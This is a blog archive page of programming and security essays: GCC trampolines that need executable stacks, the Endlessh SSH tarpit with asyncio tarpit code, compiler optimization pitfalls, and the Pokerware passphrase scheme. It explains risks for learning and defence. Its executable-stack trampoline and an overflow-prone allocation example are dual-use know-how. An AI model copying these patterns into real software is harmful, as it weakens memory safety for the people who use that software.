Articles tagged netsec at null program

Infectious Executable Stacks

2019-11-15T03:29:37Z

This article was discussed on Hacker News.

In software development there are many concepts that at first glance seem useful and sound, but, after considering the consequences of their implementation and use, are actually horrifying. Examples include thread cancellation, variable length arrays, and memory aliasing. GCC’s closure extension to C is another, and this little feature compromises the entire GNU toolchain.

GNU C nested functions

GCC has its own dialect of C called GNU C. One feature unique to GNU C is nested functions, which allow C programs to define functions inside other functions:

void intsort1(int *base, size_t nmemb)
{
    int cmp(const void *a, const void *b)
    {
        return *(int *)a - *(int *)b;
    }
    qsort(base, nmemb, sizeof(*base), cmp);
}

The nested function above is straightforward and harmless. It’s nothing groundbreaking, and it is trivial for the compiler to implement. The cmp function is really just a static function whose scope is limited to the containing function, no different than a local static variable.

With one slight variation the nested function turns into a closure. This is where things get interesting:

void intsort2(int *base, size_t nmemb, _Bool invert)
{
    int cmp(const void *a, const void *b)
    {
        int r = *(int *)a - *(int *)b;
        return invert ? -r : r;
    }
    qsort(base, nmemb, sizeof(*base), cmp);
}

The invert variable from the outer scope is accessed from the inner scope. This has clean, proper closure semantics and works correctly just as you’d expect. It fits quite well with traditional C semantics. The closure itself is re-entrant and thread-safe. It’s automatically (read: stack) allocated, and so it’s automatically freed when the function returns, including when the stack is unwound via longjmp(). It’s a natural progression to support closures like this via nested functions. The eventual caller, qsort, doesn’t even know it’s calling a closure!

While this seems so useful and easy, its implementation has serious consequences that, in general, outweigh its benefits. In fact, in order to make this work, the whole GNU toolchain has been specially rigged!

How does it work? The function pointer, cmp, passed to qsort must somehow be associated with its lexical environment, specifically the invert variable. A static address won’t do. When I implemented closures as a toy library, I talked about the function address for each closure instance somehow needing to be unique.

GCC accomplishes this by constructing a trampoline on the stack. That trampoline has access to the local variables stored adjacent to it, also on the stack. GCC also generates a normal cmp function, like the simple nested function before, that accepts invert as an additional argument. The trampoline calls this function, passing the local variable as this additional argument.

Trampoline illustration

To illustrate this, I’ve manually implemented intsort2() below for x86-64 (System V ABI) without using GCC’s nested function extension:

int cmp(const void *a, const void *b, _Bool invert)
{
    int r = *(int *)a - *(int *)b;
    return invert ? -r : r;
}

void intsort3(int *base, size_t nmemb, _Bool invert)
{
    unsigned long fp = (unsigned long)cmp;
    volatile unsigned char buf[] = {
        // mov  edx, invert
        0xba, invert, 0x00, 0x00, 0x00,
        // mov  rax, cmp
        0x48, 0xb8, fp >>  0, fp >>  8, fp >> 16, fp >> 24,
                    fp >> 32, fp >> 40, fp >> 48, fp >> 56,
        // jmp  rax
        0xff, 0xe0
    };
    int (*trampoline)(const void *, const void *) = (void *)buf;
    qsort(base, nmemb, sizeof(*base), trampoline);
}

Here’s a complete example you can try yourself on nearly any x86-64 unix-like system: trampoline.c. It even works with Clang. The two notable systems where stack trampolines won’t work are OpenBSD and WSL.

(Note: The volatile is necessary because C compilers rightfully do not see the contents of buf as being consumed. Execution of the contents isn’t considered.)

In case you hadn’t already caught it, there’s a catch. The linker needs to link a binary that asks the loader for an executable stack (-z execstack):

$ cc -std=c99 -Os -Wl,-z,execstack trampoline.c

That’s because buf contains x86 code implementing the trampoline:

mov  edx, invert    ; assign third argument
mov  rax, cmp       ; store cmp address in RAX register
jmp  rax            ; jump to cmp

(Note: The absolute jump through a 64-bit register is necessary because the trampoline on the stack and the jump target will be very far apart. Further, these days the program will likely be compiled as a Position Independent Executable (PIE), so cmp might itself have a high address rather than load into the lowest 32 bits of the address space.)

However, executable stacks were phased out ~15 years ago because they make buffer overflows so much more dangerous! Attackers can inject and execute whatever code they like, typically shellcode. That’s why we need this unusual linker option.

You can see that the stack will be executable using our old friend, readelf:

$ readelf -l a.out
...
  GNU_STACK  0x00000000 0x00000000 0x00000000
             0x00000000 0x00000000 RWE   0x10
...

Note the “RWE” at the bottom right, meaning read-write-execute. This is a really bad sign in a real binary. Do any binaries installed on your system right now have an executable stack? I found one on mine. (Update: A major one was found in the comments by Walter Misar.)
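To answer that question without eyeballing readelf output for every file, the same check can be scripted. The following is a minimal sketch, not part of the original article: it reads the GNU_STACK program header directly and only handles little-endian ELF64 files (the usual case on x86-64 Linux). The function name gnu_stack_flags is made up for illustration.

```python
import struct

PT_GNU_STACK = 0x6474E551    # program header type used for the stack note
PF_X, PF_W, PF_R = 1, 2, 4   # ELF segment permission bits


def gnu_stack_flags(data):
    """Return a string such as 'RW' or 'RWE' for the GNU_STACK program
    header, or None if the file has no such header.

    Assumption: only little-endian ELF64 input is supported.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    # Fixed offsets within the ELF64 file header.
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    for i in range(e_phnum):
        # In ELF64, p_type and p_flags are the first two 32-bit fields.
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            names = (("R", PF_R), ("W", PF_W), ("E", PF_X))
            return "".join(name for name, bit in names if p_flags & bit)
    return None
```

Calling gnu_stack_flags(open("a.out", "rb").read()) on the trampoline example should report the same flags that readelf prints, so any result containing "E" deserves a closer look.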

When compiling the original version using a nested function there’s no need for that special linker option. That’s because GCC saw that it would need an executable stack and used this option automatically.

Or, more specifically, GCC stopped requesting a non-executable stack in the object file it produced. For the GNU Binutils linker, the default is an executable stack.

Fail open design

Since this is the default, the only way to get a non-executable stack is if every object file input to the linker explicitly declares that it does not need an executable stack. To request a non-executable stack, an object file must contain the (empty) section .note.GNU-stack. If even a single object file fails to do this, then the final program gets an executable stack.

Not only does one contaminated object file infect the binary, everything dynamically linked with it also gets an executable stack. Entire processes are infected! This occurs even via dlopen(), where the stack is dynamically made executable to accommodate the new shared object.

I’ve been bit myself. In Baking Data with Serialization I did it completely by accident, and I didn’t notice my mistake until three years later. The GNU linker outputs object files without the special note by default even though the object file only contains data.

$ echo hello world >hello.txt
$ ld -r -b binary -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
$

This is fixed with -z noexecstack:

$ ld -r -b binary -z noexecstack -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
  [ 2] .note.GNU-stack  PROGBITS  00000000  0000004c
$

This may happen any time you link object files not produced by GCC, such as output from the NASM assembler or hand-crafted object files.

Nested C closures are super slick, but they’re just not worth the risk of an executable stack, and they’re certainly not worth an entire toolchain being fail open about it.

Update: A rebuttal. My short response is that the issue discussed in my article isn’t really about C the language but rather about an egregious issue with one particular toolchain. The problem doesn’t even arise if you use only C, but instead when linking in object files specifically not derived from C code.

Endlessh: an SSH Tarpit

2019-03-22T17:26:45Z

This article was discussed on Hacker News (later) and on reddit (also), and was featured in BSD Now 294. Also check out this Endlessh analysis.

I’m a big fan of tarpits: a network service that intentionally inserts delays in its protocol, slowing down clients by forcing them to wait. This arrests the speed at which a bad actor can attack or probe the host system, and it ties up some of the attacker’s resources that might otherwise be spent attacking another host. When done well, a tarpit imposes more cost on the attacker than the defender.

The Internet is a very hostile place, and anyone who’s ever stood up an Internet-facing IPv4 host has witnessed the immediate and continuous attacks against their server. I’ve maintained such a server for nearly six years now, and more than 99% of my incoming traffic has ill intent. One part of my defenses has been tarpits in various forms. The latest addition is an SSH tarpit I wrote a couple of months ago:

Endlessh: an SSH tarpit

This program opens a socket and pretends to be an SSH server. However, it actually just ties up SSH clients with false promises indefinitely — or at least until the client eventually gives up. After cloning the repository, here’s how you can try it out for yourself (default port 2222):

$ make
$ ./endlessh &
$ ssh -p2222 localhost

Your SSH client will hang there and wait for at least several days before finally giving up. Like a mammoth in the La Brea Tar Pits, it got itself stuck and can’t get itself out. As I write, my Internet-facing SSH tarpit currently has 27 clients trapped in it. A few of these have been connected for weeks. In one particular spike it had 1,378 clients trapped at once, lasting about 20 hours.

My Internet-facing Endlessh server listens on port 22, which is the standard SSH port. I long ago moved my real SSH server off to another port where it sees a whole lot less SSH traffic — essentially none. This makes the logs a whole lot more manageable. And (hopefully) Endlessh convinces attackers not to look around for an SSH server on another port.

How does it work? Endlessh exploits a little paragraph in RFC 4253, the SSH protocol specification. Immediately after the TCP connection is established, and before negotiating the cryptography, both ends send an identification string:

SSH-protoversion-softwareversion SP comments CR LF

The RFC also notes:

The server MAY send other lines of data before sending the version string.

There is no limit on the number of lines, just that these lines must not begin with “SSH-” since that would be ambiguous with the identification string, and lines must not be longer than 255 characters including CRLF. So Endlessh sends an endless stream of randomly-generated “other lines of data” without ever intending to send a version string. By default it waits 10 seconds between each line. This slows down the protocol, but prevents it from actually timing out.
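The two constraints on these lines are easy to get subtly wrong, so here is a small sketch of a generator that respects them. It is an illustration only and not necessarily how Endlessh builds its lines: the name generate_line mirrors the helper in the C loop shown later, while the printable-ASCII body and the random length are assumptions.

```python
import random


def generate_line(rng=random, max_len=255):
    """Return one random banner line, CRLF included.

    Constraints taken from the text: at most 255 characters including
    CRLF, and the line must not start with "SSH-".
    Assumption: the body is random printable ASCII of random length.
    """
    length = rng.randint(3, max_len)  # total length, CRLF included
    body = bytes(rng.randint(32, 126) for _ in range(length - 2))
    if body.startswith(b"SSH-"):
        # Would be ambiguous with the identification string, so alter it.
        body = b"X" + body[1:]
    return body + b"\r\n"
```

Replacing the first byte rather than regenerating the whole line keeps the function free of retry loops, at the cost of a very slight bias in the first character.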

This means Endlessh need not know anything about cryptography or the vast majority of the SSH protocol. It’s dead simple.

Implementation strategies

Ideally the tarpit’s resource footprint should be as small as possible. It’s just a security tool, and the server does have an actual purpose that doesn’t include being a tarpit. It should tie up the attacker’s resources, not the server’s, and should generally be unnoticeable. (Take note all those who write the awful “security” products I have to tolerate at my day job.)

Even when many clients have been trapped, Endlessh spends more than 99.999% of its time waiting around, doing nothing. It wouldn’t even be accurate to call it I/O-bound. If anything, it’s timer-bound, waiting around before sending off the next line of data. The most precious resource to conserve is memory.

Processes

The most straightforward way to implement something like Endlessh is a fork server: accept a connection, fork, and the child simply alternates between sleep(3) and write(2):

for (;;) {
    ssize_t r;
    char line[256];

    sleep(DELAY);
    generate_line(line);
    r = write(fd, line, strlen(line));
    if (r == -1 && errno != EINTR) {
        exit(0);
    }
}

A process per connection is a lot of overhead when connections are expected to be up for hours or even weeks at a time. An attacker who knows about this could exhaust the server’s resources with little effort by opening up lots of connections.

Threads

A better option is, instead of processes, to create a thread per connection. On Linux this is practically the same thing, but it’s still better. However, you still have to allocate a stack for the thread and the kernel will have to spend some resources managing the thread.

Poll

For Endlessh I went for an even more lightweight version: a single-threaded poll(2) server, analogous to stackless green threads. The overhead per connection is about as low as it gets.

Clients that are being delayed are not registered in poll(2). Their only overhead is the socket object in the kernel, and another 78 bytes to track them in Endlessh. Most of those bytes are used only for accurate logging. Only those clients that are overdue for a new line are registered for poll(2).

When clients are waiting, but no clients are overdue, poll(2) is essentially used in place of sleep(3). Though since it still needs to manage the accept server socket, it (almost) never actually waits on nothing.
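The scheduling idea in the last two paragraphs can be sketched in a few lines. This is a simplified model, not Endlessh's actual data structures: it assumes every client uses the same delay, so a FIFO queue of (send time, client) pairs is always in deadline order, and the function names are invented for the example.

```python
import collections


def next_timeout_ms(queue, now_ms):
    """Timeout to hand to poll(2): the time until the oldest waiting
    client is due, 0 if one is already overdue, or -1 (wait
    indefinitely) when nobody is waiting.

    queue: deque of (send_at_ms, client) pairs in deadline order.
    """
    if not queue:
        return -1
    return max(0, queue[0][0] - now_ms)


def pop_overdue(queue, now_ms):
    """Remove and return the clients whose next line is due. Only these
    would be registered with poll(2) for writing."""
    overdue = []
    while queue and queue[0][0] <= now_ms:
        overdue.append(queue.popleft()[1])
    return overdue
```

In a real server the listening socket stays registered the whole time, so the timeout only bounds how long the loop waits for a new connection before servicing the next overdue client.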

There’s an option to limit the total number of client connections so that it doesn’t get out of hand. In this case it will stop polling the accept socket until a client disconnects. I probably shouldn’t have bothered with this option and instead relied on ulimit, a feature already provided by the operating system.

I could have used epoll (Linux) or kqueue (BSD), which would be much more efficient than poll(2). The problem with poll(2) is that it’s constantly registering and unregistering Endlessh on each of the overdue sockets each time around the main loop. This is by far the most CPU-intensive part of Endlessh, and it’s all inflicted on the kernel. Most of the time, even with thousands of clients trapped in the tarpit, only a small number of them are polled at once, so I opted for better portability instead.

One consequence of not polling connections that are waiting is that disconnections aren’t noticed in a timely fashion. This makes the logs less accurate than I like, but otherwise it’s pretty harmless. Unfortunately even if I wanted to fix this, the poll(2) interface isn’t quite equipped for it anyway.

Raw sockets

With a poll(2) server, the biggest overhead remaining is in the kernel, where it allocates send and receive buffers for each client and manages the proper TCP state. The next step to reducing this overhead is Endlessh opening a raw socket and speaking TCP itself, bypassing most of the operating system’s TCP/IP stack.

Much of the TCP connection state doesn’t matter to Endlessh and doesn’t need to be tracked. For example, it doesn’t care about any data sent by the client, so no receive buffer is needed, and any data that arrives could be dropped on the floor.

Even more, raw sockets would allow for some even nastier tarpit tricks. Despite the long delays between data lines, the kernel itself responds very quickly on the TCP layer and below. ACKs are sent back quickly and so on. An astute attacker could detect that the delay is artificial, imposed above the TCP layer by an application.

If Endlessh worked at the TCP layer, it could tarpit the TCP protocol itself. It could introduce artificial “noise” to the connection that requires packet retransmissions, delay ACKs, etc. It would look a lot more like network problems than a tarpit.

I haven’t taken Endlessh this far, nor do I plan to do so. At the moment attackers either have a hard timeout, so this wouldn’t matter, or they’re pretty dumb and Endlessh already works well enough.

asyncio and other tarpits

Since writing Endlessh I’ve learned about Python’s asyncio, and it’s actually a near perfect fit for this problem. I should have just used it in the first place. The hard part is already implemented within asyncio, and the problem isn’t CPU-bound, so being written in Python doesn’t matter.

Here’s a simplified (no logging, no configuration, etc.) version of Endlessh implemented in about 20 lines of Python 3.7:

import asyncio
import random

async def handler(_reader, writer):
    try:
        while True:
            await asyncio.sleep(10)
            writer.write(b'%x\r\n' % random.randint(0, 2**32))
            await writer.drain()
    except ConnectionResetError:
        pass

async def main():
    server = await asyncio.start_server(handler, '0.0.0.0', 2222)
    async with server:
        await server.serve_forever()

asyncio.run(main())

Since Python coroutines are stackless, the per-connection memory overhead is comparable to the C version. So it seems asyncio is perfectly suited for writing tarpits! Here’s an HTTP tarpit to trip up attackers trying to exploit HTTP servers. It slowly sends a random, endless HTTP header:

import asyncio
import random

async def handler(_reader, writer):
    writer.write(b'HTTP/1.1 200 OK\r\n')
    try:
        while True:
            await asyncio.sleep(5)
            header = random.randint(0, 2**32)
            value = random.randint(0, 2**32)
            writer.write(b'X-%x: %x\r\n' % (header, value))
            await writer.drain()
    except ConnectionResetError:
        pass

async def main():
    server = await asyncio.start_server(handler, '0.0.0.0', 8080)
    async with server:
        await server.serve_forever()

asyncio.run(main())

Try it out for yourself. Firefox and Chrome will spin on that server for hours before giving up. I have yet to see curl actually time out on its own in the default settings (--max-time/-m does work correctly, though).

Parting exercise for the reader: Using the examples above as a starting point, implement an SMTP tarpit using asyncio. Bonus points for using TLS connections and testing it against real spammers.

When the Compiler Bites

2018-05-01T23:28:06Z

Update: There are discussions on Reddit and on Hacker News.

So far this year I’ve been bitten three times by compiler edge cases in GCC and Clang, each time catching me totally by surprise. Two were caused by historical artifacts, where an ambiguous specification led to diverging implementations. The third was a compiler optimization being far more clever than I expected, behaving almost like an artificial intelligence.

In all examples I’ll be using GCC 7.3.0 and Clang 6.0.0 on Linux.

x86-64 ABI ambiguity

The first time I was bit — or, well, narrowly avoided being bit — was when I examined a missed floating point optimization in both Clang and GCC. Consider this function:

double
zero_multiply(double x)
{
    return x * 0.0;
}

The function multiplies its argument by zero and returns the result. Any number multiplied by zero is zero, so this should always return zero, right? Unfortunately, no. IEEE 754 floating point arithmetic supports NaN, infinities, and signed zeros. This function can return NaN, positive zero, or negative zero. (In some cases, the operation could also potentially produce a hardware exception.)
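These special cases are easy to observe from Python, whose float is an IEEE 754 double on essentially every platform. The snippet below is only an illustration of the arithmetic, not of what either compiler emits.

```python
import math


def zero_multiply(x):
    # Same expression as the C function above.
    return x * 0.0


nan_result = zero_multiply(float("nan"))   # NaN in, NaN out
inf_result = zero_multiply(float("inf"))   # infinity times zero is NaN
neg_result = zero_multiply(-2.0)           # negative zero
pos_result = zero_multiply(2.0)            # positive zero

# -0.0 == 0.0 compares equal, so use copysign to expose the sign bit.
neg_sign = math.copysign(1.0, neg_result)
pos_sign = math.copysign(1.0, pos_result)
```

Here neg_sign is -1.0 and pos_sign is 1.0, while both NaN results can only be detected with math.isnan() because NaN never compares equal to anything.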

As a result, both GCC and Clang perform the multiply:

zero_multiply:
    xorpd  xmm1, xmm1
    mulsd  xmm0, xmm1
    ret

The -ffast-math option relaxes the C standard floating point rules, permitting an optimization at the cost of conformance and consistency:

zero_multiply:
    xorps  xmm0, xmm0
    ret

Side note: -ffast-math doesn’t necessarily mean “less precise.” Sometimes it will actually improve precision.

Here’s a modified version of the function that’s a little more interesting. I’ve changed the argument to a short:

double
zero_multiply_short(short x)
{
    return x * 0.0;
}

It’s no longer possible for the argument to be one of those special values. The short will be promoted to one of 65,536 possible double values, each of which results in 0.0 when multiplied by 0.0. GCC misses this optimization (-Os):

zero_multiply_short:
    movsx     edi, di       ; sign-extend 16-bit argument
    xorps     xmm1, xmm1    ; xmm1 = 0.0
    cvtsi2sd  xmm0, edi     ; convert int to double
    mulsd     xmm0, xmm1
    ret

Clang also misses this optimization:

zero_multiply_short:
    cvtsi2sd xmm1, edi
    xorpd    xmm0, xmm0
    mulsd    xmm0, xmm1
    ret

But hang on a minute. This is shorter by one instruction. What happened to the sign-extension (movsx)? Clang is treating that short argument as if it were a 32-bit value. Why do GCC and Clang differ? Is GCC doing something unnecessary?

It turns out that the x86-64 ABI didn’t specify what happens with the upper bits in argument registers. Are they garbage? Are they zeroed? GCC takes the conservative position of assuming the upper bits are arbitrary garbage. Clang takes the boldest position of assuming arguments smaller than 32 bits have been promoted to 32 bits by the caller. This is what the ABI specification should have said, but currently it does not.
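The difference between the two assumptions can be modeled with plain integers. This is a sketch of the register interpretation only, with helper names invented for the example; it does not reproduce either compiler's code generation.

```python
def as_int16(reg):
    """GCC's reading: trust only the low 16 bits and sign-extend them,
    which is what the movsx instruction does."""
    low = reg & 0xFFFF
    return low - 0x10000 if low & 0x8000 else low


def as_int32(reg):
    """Clang's reading: assume the caller already promoted the short,
    so the low 32 bits are taken as a signed value directly."""
    low = reg & 0xFFFFFFFF
    return low - 0x100000000 if low & 0x80000000 else low


promoted = 0xFFFFFFFE   # -2 correctly sign-extended to 32 bits by the caller
garbage = 0xDEAD0005    # 5 in the low 16 bits, junk in the upper bits
```

With a properly promoted argument both readings agree (as_int16(promoted) and as_int32(promoted) are both -2). With junk in the upper bits, as_int16(garbage) is still 5 but as_int32(garbage) is a large negative number, which is the failure a hand-written assembly caller would run into.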

Fortunately GCC is also conservative when passing arguments. It promotes arguments to 32 bits as necessary, so there are no conflicts when linking against Clang-compiled code. However, this is not true for Intel’s ICC compiler: Clang and ICC are not ABI-compatible on x86-64.

I don’t use ICC, so that particular issue wouldn’t bite me, but if I was ever writing assembly routines that called Clang-compiled code, I’d eventually get bit by this.

Floating point precision

Without looking it up or trying it, what does this function return? Think carefully.

int
float_compare(void)
{
    float x = 1.3f;
    return x == 1.3f;
}

Confident in your answer? This is a trick question, because it can return either 0 or 1 depending on the compiler. Boy was I confused when this comparison returned 0 in my real world code.

$ gcc   -std=c99 -m32 cmp.c  # float_compare() == 0
$ clang -std=c99 -m32 cmp.c  # float_compare() == 1

So what’s going on here? The original ANSI C specification wasn’t clear about how intermediate floating point values get rounded, and implementations all did it differently. The C99 specification cleaned this all up and introduced FLT_EVAL_METHOD. Implementations can still differ, but at least you can now determine at compile-time what the compiler would do by inspecting that macro.

Back in the late 1980’s or early 1990’s when the GCC developers were deciding how GCC should implement floating point arithmetic, the trend at the time was to use as much precision as possible. On the x86 this meant using its support for 80-bit extended precision floating point arithmetic. Floating point operations are performed in long double precision and truncated afterward (FLT_EVAL_METHOD == 2).

In float_compare() the left-hand side is truncated to a float by the assignment, but the right-hand side, despite being a float literal, is actually “1.3” at 80 bits of precision as far as GCC is concerned. That’s pretty unintuitive!
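The effect can be reproduced without an x87 FPU by rounding one side to single precision and leaving the other at a wider precision. In this sketch Python's double stands in for the 80-bit format (an assumption made purely for illustration), and to_float32 is a helper invented for the example.

```python
import struct


def to_float32(x):
    """Round a Python float (a double) to the nearest single-precision
    value, as the assignment to a float variable does."""
    return struct.unpack("<f", struct.pack("<f", x))[0]


x = to_float32(1.3)                  # left-hand side: truncated by assignment

wide_compare = x == 1.3              # right-hand side kept at higher precision
narrow_compare = x == to_float32(1.3)  # both sides rounded to float
```

Here wide_compare is False and narrow_compare is True, matching the 0 and 1 results from the two compilers. A value such as 1.5, which single precision represents exactly, compares equal either way.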

The remnants of this high precision trend are still in JavaScript, where all arithmetic is double precision (even if simulated using integers), and great pains have been taken to work around the performance consequences of this. Until recently, Mono had similar issues.

The trend reversed once SIMD hardware became widely available and there were huge performance gains to be had. Multiple values could be computed at once, side by side, at lower precision. So on x86-64, this became the default (FLT_EVAL_METHOD == 0). The young Clang compiler wasn’t around until well after this trend reversed, so it behaves differently than the backwards compatible GCC on the old x86.

I’m a little ashamed that I’m only finding out about this now. However, by the time I was competent enough to notice and understand this issue, I was already doing nearly all my programming on the x86-64.

Built-in Function Elimination

I’ve saved this one for last since it’s my favorite. Suppose we have this little function, new_image(), that allocates a greyscale image for, say, some multimedia library.

static unsigned char *
new_image(size_t w, size_t h, int shade)
{
    unsigned char *p = 0;
    if (w == 0 || h <= SIZE_MAX / w) { // overflow?
        p = malloc(w * h);
        if (p) {
            memset(p, shade, w * h);
        }
    }
    return p;
}

It’s a static function because this would be part of some slick header library (and, secretly, because it’s necessary for illustrating the issue). Being a responsible citizen, the function even checks for integer overflow before allocating anything.
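The overflow check is worth a closer look, since it has to avoid computing w * h before knowing the product fits. Below is a model of it using Python integers, assuming a 64-bit size_t. The helper names are made up for the example.

```python
SIZE_MAX = 2**64 - 1  # assumption: 64-bit size_t


def wrapped_product(w, h):
    """What w * h evaluates to in C, where size_t arithmetic wraps."""
    return (w * h) & SIZE_MAX


def size_fits(w, h):
    """The condition used in new_image(): true when w * h cannot wrap."""
    return w == 0 or h <= SIZE_MAX // w


# Without the check, a 2**32 by 2**32 image would request zero bytes.
silent_wrap = wrapped_product(2**32, 2**32)
```

size_fits(2, SIZE_MAX) is False, which is the case the overflow unit test exercises, while size_fits(1, SIZE_MAX) is True, so a request of exactly SIZE_MAX bytes reaches malloc(). The division form works because it never forms the oversized product in the first place.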

I write a unit test to make sure it detects overflow. This function should return 0.

/* expected return == 0 */
int
test_new_image_overflow(void)
{
    void *p = new_image(2, SIZE_MAX, 0);
    return !!p;
}

So far my test passes. Good.

I’d also like to make sure it correctly returns NULL (or, more specifically, that it doesn’t crash) if the allocation fails. But how can I make malloc() fail? As a hack I can pass image dimensions that I know cannot ever practically be allocated. Essentially I want to force a malloc(SIZE_MAX), i.e. allocate every available byte in my virtual address space. For a conventional 64-bit machine, that’s 16 exbibytes of memory, and it leaves space for nothing else, including the program itself.

/* expected return == 0 */
int
test_new_image_oom(void)
{
    void *p = new_image(1, SIZE_MAX, 0xff);
    return !!p;
}

I compile with GCC, test passes. I compile with Clang and the test fails. That is, the test somehow managed to allocate 16 exbibytes of memory, and initialize it. Wat?

Disassembling the test reveals what’s going on:

test_new_image_overflow:
    xor  eax, eax
    ret

test_new_image_oom:
    mov  eax, 1
    ret

The first test is actually being evaluated at compile time by the compiler. The function being tested was inlined into the unit test itself. This permits the compiler to collapse the whole thing down to a single instruction. The path with malloc() became dead code and was trivially eliminated.

In the second test, Clang correctly determined that the image buffer is not actually being used, despite the memset(), so it eliminated the allocation altogether and then simulated a successful allocation despite it being absurdly large. Allocating memory is not an observable side effect as far as the language specification is concerned, so it’s allowed to do this. My thinking was wrong, and the compiler outsmarted me.

I soon realized I can take this further and trick Clang into performing an invalid optimization, revealing a bug. Consider this slightly-optimized version that uses calloc() when the shade is zero (black). The calloc() function does its own overflow check, so new_image() doesn’t need to do it.

static void *
new_image(size_t w, size_t h, int shade)
{
    unsigned char *p = 0;
    if (shade == 0) { // shortcut
        p = calloc(w, h);
    } else if (w == 0 || h <= SIZE_MAX / w) { // overflow?
        p = malloc(w * h);
        if (p) {
            memset(p, shade, w * h);
        }
    }
    return p;
}

With this change, my overflow unit test is now also failing. The situation is even worse than before. The calloc() is being eliminated despite the overflow, and replaced with a simulated success. This time it’s actually a bug in Clang. While failing a unit test is mostly harmless, this could introduce a vulnerability in a real program. The OpenBSD folks are so worried about this sort of thing that they’ve disabled this optimization.

Here’s a slightly-contrived example of this. Imagine a program that maintains a table of unsigned integers, and we want to keep track of how many times the program has accessed each table entry. The “access counter” table is initialized to zero, but the table of values need not be initialized, since they’ll be written before first access (or something like that).

struct table {
    unsigned *counter;
    unsigned *values;
};

static int
table_init(struct table *t, size_t n)
{
    t->counter = calloc(n, sizeof(*t->counter));
    if (t->counter) {
        /* Overflow already tested above */
        t->values = malloc(n * sizeof(*t->values));
        if (!t->values) {
            free(t->counter);
            return 0; // fail
        }
        return 1; // success
    }
    return 0; // fail
}

This function relies on the overflow test in calloc() for the second malloc() allocation. However, this is a static function that’s likely to get inlined, as we saw before. If the program doesn’t actually make use of the counter table, and Clang is able to statically determine this fact, it may eliminate the calloc(). This would also eliminate the overflow test, introducing a vulnerability. If an attacker can control n, then they can overwrite arbitrary memory through that values pointer.

The takeaway

Besides this surprising little bug, the main lesson for me is that I should probably isolate unit tests from the code being tested. The easiest solution is to put them in separate translation units and avoid link-time optimization (LTO). Allowing tested functions to be inlined into the unit tests is probably a bad idea.

The unit test issues in my real program, which was a bit more sophisticated than what was presented here, gave me artificial intelligence vibes. It’s that situation where a computer algorithm did something really clever and I felt it outsmarted me. It’s creepy to consider how far that can go. I’ve gotten that even from observing AI I’ve written myself, and I know for sure no human taught it some particularly clever trick.

My favorite AI story along these lines is about an AI that learned how to play games on the Nintendo Entertainment System. It didn’t understand the games it was playing. Its optimization task was simply to choose controller inputs that maximized memory values, because that’s generally associated with doing well: higher scores, more progress, etc. The most unexpected part came when playing Tetris. Eventually the screen would fill up with blocks, and the AI would face the inevitable situation of losing the game, with all that memory being reinitialized to low values. So what did it do?

Just before the end it would pause the game and wait… forever.

Introducing the Pokerware Secure Passphrase Generator

2017-07-27T17:49:10Z

I recently developed Pokerware, an offline passphrase generator that operates in the same spirit as Diceware. The primary difference is that it uses a shuffled deck of playing cards as its entropy source rather than dice. Draw some cards and use them to select a uniformly random word from a list. Unless you’re some sort of tabletop gaming nerd, a deck of cards is more readily available than five 6-sided dice, which would typically need to be borrowed from the Monopoly board collecting dust on the shelf, then rolled two at a time.

There are various flavors of two different word lists here:

https://github.com/skeeto/pokerware/releases/tag/1.0

Hardware random number generators are difficult to verify and may not actually be as random as they promise, either intentionally or unintentionally. For the particularly paranoid, Diceware and Pokerware are an easily verifiable alternative for generating secure passphrases for cryptographic purposes. At any time, a deck of 52 playing cards is in one of 52! possible arrangements. That’s more than 225 bits of entropy. If you give your deck a thorough shuffle, it will be in an arrangement that has never been seen before and will never be seen again. Pokerware draws on some of these bits to generate passphrases.
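The 225-bit figure is just the base-2 logarithm of the number of arrangements, which is quick to confirm:

```python
import math


def deck_entropy_bits(cards=52):
    """Bits of entropy in a uniformly shuffled deck: log2(cards!)."""
    return math.log2(math.factorial(cards))


bits = deck_entropy_bits()  # a little over 225.5
```

This assumes the shuffle is thorough enough that every arrangement is equally likely. A sloppy shuffle yields fewer bits than the theoretical maximum.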

The Pokerware list has 5,304 words (12.4 bits per word), compared to Diceware’s 7,776 words (12.9 bits per word). My goal was to invent a card-drawing scheme that would uniformly select from a list in the same sized ballpark as Diceware. Much smaller and you’d have to memorize more words for the same passphrase strength. Much larger and the words on the list would be more difficult to memorize, since the list would contain longer and less frequently used words. Diceware strikes a nice balance at five dice.
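The per-word figures follow directly from the list sizes, and the same arithmetic shows how many words a given strength target requires. A small sketch, where the 64-bit target is an arbitrary example and not a recommendation from the article:

```python
import math

POKERWARE_WORDS = 5304
DICEWARE_WORDS = 6**5  # five 6-sided dice: 7,776


def bits_per_word(list_size):
    """Entropy of one uniformly chosen word."""
    return math.log2(list_size)


def words_needed(target_bits, list_size):
    """Smallest word count whose total entropy reaches target_bits."""
    return math.ceil(target_bits / bits_per_word(list_size))


pokerware_bits = round(bits_per_word(POKERWARE_WORDS), 1)  # 12.4
diceware_bits = round(bits_per_word(DICEWARE_WORDS), 1)    # 12.9
```

For a 64-bit target, words_needed(64, POKERWARE_WORDS) is 6 and words_needed(64, DICEWARE_WORDS) is 5, so the smaller list occasionally costs one extra word.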

One important difference for me is that I like my Pokerware word lists a lot more than the two official Diceware lists. My lists only have simple, easy-to-remember words (for American English speakers, at least), without any numbers or other short non-words. Pokerware has two official lists, “formal” and “slang,” since my early testers couldn’t agree on which was better. Rather than make a difficult decision, I took the usual route of making no decision at all.

The “formal” list is derived in part from Google’s Ngram Viewer, with my own additional filters and tweaking. It’s called “formal” because the ngrams come from formal publications and represent more formal kinds of speech.

The “slang” list is derived from every reddit comment between December 2005 and May 2017, tamed by the same additional filters. I have this data on hand, so I may as well put it to use. I figured more casually-used words would be easier to remember. Due to my extra filtering, there’s actually a lot of overlap between these lists, so the differences aren’t too significant.

If you have your own word list, perhaps in a different language, you can use the Makefile in the repository to build your own Pokerware lookup table, both plain text and PDF. The PDF is generated using Groff macros.

Passphrase generation instructions

1. Thoroughly shuffle the deck.
2. Draw two cards. Sort them by value, then suit. Suits are in alphabetical order: Clubs, Diamonds, Hearts, Spades.
3. Draw additional cards until you get a card that doesn’t match the face value of either of your initial two cards. Observe its suit.
4. Using your two cards and observed suit, look up a word in the table.
